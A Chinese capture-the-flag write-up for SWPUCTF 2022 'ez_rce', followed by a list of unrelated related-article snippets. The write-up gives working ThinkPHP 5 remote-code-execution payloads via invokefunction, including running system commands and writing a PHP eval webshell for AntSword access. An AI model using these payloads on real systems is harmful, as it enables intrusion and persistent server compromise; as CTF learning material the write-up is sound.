[SWPUCTF 2022 新生赛]ez_rce
打开题目就在线环境,发现只有一句话:真的什么都没有吗
F12查看控制台和源代码也没发现任何信息,然后用虚拟机里面的dirsearch扫一下这个网站就能得到:
然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到:
然后访问:/NSS/index.php/:
这里直接搜索ThingkPHP V5就能得到这个漏洞复现的方法,我就是根据搜索到的帖子的漏洞复现方法跟着做的。
payload:?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>(将php代码写入shell.php)
再访问/NSS/shell.php
然后再
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>(删除/shell.php替换)
最后蚁剑连接,网址:http://node5.anna.nssctf.cn:22775/NSS/shell.php
密码为1
最后flag的路径为:/nss/ctf/flag
相关文章:
[SWPUCTF 2022 新生赛]ez_rce
打开题目就在线环境,发现只有一句话:真的什么都没有吗 F12查看控制台和源代码也没发现任何信息,然后用虚拟机里面的dirsearch扫一下这个网站就能得到: 然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到: …...
递归、搜索与回溯算法 —— 名词解析
目录 一、递归 1、什么是递归? 2、递归的数学类比 3、为什么要用到递归? 问题具有递归结构: 代码简洁易懂: 解决复杂问题: 处理嵌套结构: 4、如何理解递归? 明确基准条件: …...
【docker】docker swarm lock和unlock的区别,以及旧节点重启的隐患
docker swarm lock/unlock 的作用 Docker Swarm 提供了**加密集群状态(Encrypted Raft logs)**的功能,可以防止 Swarm 集群的管理数据(如任务分配、集群配置等)在磁盘上被未授权访问。 docker swarm lock:…...
Grafana使用日志5--如何重置Grafana密码
背景 有时候当账号太多的时候,根本记不住所有的账号密码,这时候就很容易登录失败,这时候怎么办呢? 接下来就让我来给大家演示一下Grafana的账号如果忘记了的话,该怎么找回自己的账号密码 操作 让我们来看一下具体的…...
ELK搭建初入
ELK搭建: 1、安装ElasticSearch (用于存储收集到的日志信息) 解压安装包 tar -xzvf elasticsearch-8.17.2-linux-x86_64.tar.gz 启动es:bin/elasticsearch –d(默认端口号9200) 浏览器输入es地址。出现…...
JVM 高级面试题及答案整理,最新面试题
JVM中的垃圾收集器有哪些,它们的工作原理是什么? JVM中的垃圾收集器主要包括以下几种: 1、 Serial收集器:它是一个单线程收集器,工作时会暂停所有其他工作线程("Stop-The-World")&a…...
)
第9章:LangChain结构化输出-示例5(基于大模型如何精确匹配POJO的字段)
如何使用LangChain4j框架创建和使用多种AI服务。它通过定义接口和注解,将自然语言处理任务(如情感分析、数字提取、日期提取、POJO提取等)封装为服务,并通过LangChain4j的AiServices动态生成这些服务的实现。 本章主要讲述基于LangChain调用大模型如何进行结构化输出的真实…...
ref和reactive的区别 Vue3
Vue3中ref和reactive的区别 ref 可以定义基本数据类型,也可定义对象类型的响应式数据 reactive 只能定义对象类型的响应式数据 ref和reactive定义对象类型的响应式数据有什么不同 不同点1 ref定义的响应式数据,取值时需要先 .value 不同点2 替换整…...
基于MATLAB的OFDM通信系统仿真设计
下面将为你详细介绍基于MATLAB的OFDM通信系统仿真设计的步骤和示例代码。 1. OFDM系统原理概述 正交频分复用(OFDM)是一种多载波调制技术,它将高速数据流通过串并转换,分配到多个正交的子载波上进行传输,这样可以有效…...
地铁站内导航系统:基于蓝牙Beacon与AR技术的动态路径规划技术深度剖析
本文旨在分享一套地铁站内导航系统技术方案,通过蓝牙Beacon技术与AI算法的结合,解决传统导航定位不准确、路径规划不合理等问题,提升乘客出行体验,同时为地铁运营商提供数据支持与增值服务。 如需获取校地铁站内智能导航系统方案文…...
JS复习练习题目、完整nodejs项目以及Commons、Es
### JS复习练习 -  1. 任务1:创建一个简单的问候函数 - 编写一个函数greet,接受一个名字作为参数,并返回一个问候语,例如:“Hello, [名字]! Welcome to Jav…...
Linux:理解O(1)调度算法的设计精髓
目录 一、从厨房看调度器本质 二、O(1)算法的核心架构 1.时间复杂度的革命 2.动态优先级魔法 三、算法运行的全景图 1.时间片分配策略 2.上下文切换的艺术 前言:前面文章提到关于并发的概念,并发针对的是单核的CPU上同时运行很多情况,…...
[C++][cmake]使用C++部署yolov12目标检测的tensorrt模型支持图片视频推理windows测试通过
最近悄悄出了yolov12框架,标志着目标检测又多了一个检测利器,于是尝试在windows下部署yolov12的tensorrt模型,并最终成功。 重要说明:安装环境视为最基础操作,博文不做环境具体步骤,可以百度查询对应安装步…...
Uppy - 免费开源、功能强大的新一代 web 文件上传组件,支持集成到 Vue 项目
Uppy 这个优质的前端组件,可以解决几乎所有的文件上传问题,最近发布了 TS 重写的 4.0 新版本,实用性更强了。 Uppy 是一个 UI 外观时尚、模块化的 JavaScript 文件上传组件,这个组件可以与任何 web 技术栈集成,不仅轻…...
【游戏——BFS+分层图】
题目 分析 但凡是最优方案可能需要访问同一个点的情况,都需要应用“拆点”,或者说分层图的技巧。多出来的维度主要是区分同一个点的不同状态而用。 对于本题,访问的时机便是一个区分点。 对于类似题“AB路线”,同一个K段的位置是…...
SSL 证书是 SSL 协议实现安全通信的必要组成部分
SSL证书和SSL/TLS协议有着密切的关系,但它们本质上是不同的概念。下面是两者的区别和它们之间的关系的表格: 属性SSL/TLS 协议SSL证书英文全称SSL(Secure Sockets Layer),TLS(Transport Layer Security&am…...
:Spring Boot 与 Spring Cloud 的微服务源码解析)
Spring 源码硬核解析系列专题(七):Spring Boot 与 Spring Cloud 的微服务源码解析
在前几期中,我们从 Spring 核心的 IoC、AOP、事务管理,到 Spring Boot 的自动装配,逐步揭示了 Spring 生态的底层原理。随着微服务架构的流行,Spring Boot 结合 Spring Cloud 成为了构建分布式系统的主流选择。本篇将深入 Spring Cloud 的核心组件,以服务注册与发现(Eure…...
嵌入式开发:傅里叶变换(5):STM32和Matlab联调验证FFT
目录 1. MATLAB获取 STM32 的原始数据 2. 将数据上传到电脑 3. MATLAB 接收数据并验证 STM32进行傅里叶代码 结果分析 STM32 和 MATLAB 联调是嵌入式开发中常见的工作流程,通常目的是将 STM32 采集的数据或控制信号传输到 MATLAB 中进行实时处理、分析和可视化…...
C# 根据Ollama+DeepSeekR1开发本地AI辅助办公助手
在上一篇《访问DeepSeekR1本地部署API服务搭建自己的AI办公助手》中,我们通过通过Ollama提供的本地API接口用Python实现了一个简易的AI办公助手,但是需要运行Py脚本,还比较麻烦,下面我们用C#依据Ollama提供的API接口开发一个本地A…...
洛谷 P8705:[蓝桥杯 2020 省 B1] 填空题之“试题 E :矩阵” ← 卡特兰数
【题目来源】 https://www.luogu.com.cn/problem/P8705 【题目描述】 把 1∼2020 放在 21010 的矩阵里。要求同一行中右边的比左边大,同一列中下边的比上边的大。一共有多少种方案? 答案很大,你只需要给出方案数除以 2020 的余数即可。 【答案提交】 …...
C#编写的欧姆龙Fins HostLink协议底层通讯代码,800多行串口通讯源程序,深入研究...
C#写的欧姆龙Fins HostLink协议底层通讯代码,串口通讯源程序,自己研究通讯写的,已测试OK,共有800多行代码,可以了解欧姆龙Fins HostLink协议底层通讯原理,可以封装成库,代码有可复制性半夜两点盯…...
测试左移实战:从执行者到决策者的转型指南
测试角色的时代跃迁在敏捷与DevOps主导的软件开发浪潮中,测试左移(Shift-Left Testing)已从技术概念进化为质量保障的核心战略。它不仅是测试环节的前置,更是测试从业者从被动执行者向主动决策者转型的催化剂。本文聚焦软件测试工…...
如何用Keyviz轻松实现键盘鼠标操作可视化:新手三步快速上手指南
如何用Keyviz轻松实现键盘鼠标操作可视化:新手三步快速上手指南 【免费下载链接】keyviz Keyviz is a free and open-source tool to visualize your keystrokes ⌨️ and 🖱️ mouse actions in real-time. 项目地址: https://gitcode.com/gh_mirrors…...
别再踩坑了!ZYNQ7000双核FreeRTOS通信与LwIP API调用的五个关键细节
ZYNQ7000双核FreeRTOS通信与LwIP API调用的五个关键细节 调试ZYNQ7000双核系统就像在走钢丝——稍有不慎就会掉进隐蔽的陷阱。去年我们团队在开发工业网关时,曾因一个Cache未刷新的问题浪费了两周时间。本文将分享那些手册上不会写的实战经验,特别是当Fr…...
)
Ubuntu降级实战:从内核卸载到系统回滚的完整指南(附常见问题排查)
Ubuntu降级实战:从内核卸载到系统回滚的完整指南(附常见问题排查) 当Ubuntu系统升级后出现兼容性问题或性能下降时,回退到稳定版本往往是最高效的解决方案。不同于常规的软件降级,系统级回滚涉及内核管理、依赖链调整和…...
从零组装F450四轴:APM飞控调参与GPS校准实战指南
1. F450四轴组装前的准备工作 第一次组装无人机就像拼装一台会飞的乐高,既兴奋又充满挑战。我去年第一次接触F450机架时,发现这确实是新手入门的绝佳选择——价格亲民、结构简单、扩展性强。不过要让它真正飞起来,准备工作可不能马虎。 核心部…...
DevOps工具链选型新趋势:本土化适配与安全可控成企业核心考量
随着中国企业数字化转型进入深水区,DevOps工具链的选型标准正在发生深刻变革。传统以功能完备性为主导的评估体系,正逐步让位于对本土化适配深度与安全可控能力的综合考量。本文将深度解析主流DevOps平台的技术特性与行业适配性,为企业决策者…...
免费开源的Altium电路图转换器:轻松查看SchDoc文件无需专业软件
免费开源的Altium电路图转换器:轻松查看SchDoc文件无需专业软件 【免费下载链接】python-altium Altium schematic format documentation, SVG converter and TK viewer 项目地址: https://gitcode.com/gh_mirrors/py/python-altium 你是否曾经收到过Altium …...
3分钟上手跨平台资源嗅探下载神器res-downloader:微信视频号、抖音、QQ音乐一网打尽
3分钟上手跨平台资源嗅探下载神器res-downloader:微信视频号、抖音、QQ音乐一网打尽 【免费下载链接】res-downloader 视频号、小程序、抖音、快手、小红书、直播流、m3u8、酷狗、QQ音乐等常见网络资源下载! 项目地址: https://gitcode.com/GitHub_Trending/re/re…...
LaTeX技巧:灵活控制图表编号的三种实用方法
1. 为什么需要控制图表编号? 写论文或者技术报告的时候,我们经常会遇到这样的困扰:有些图表需要编号方便引用,有些图表又不需要编号。比如封面图片、装饰性插图,或者附录中的补充材料。这时候如果所有图表都自动编号&a…...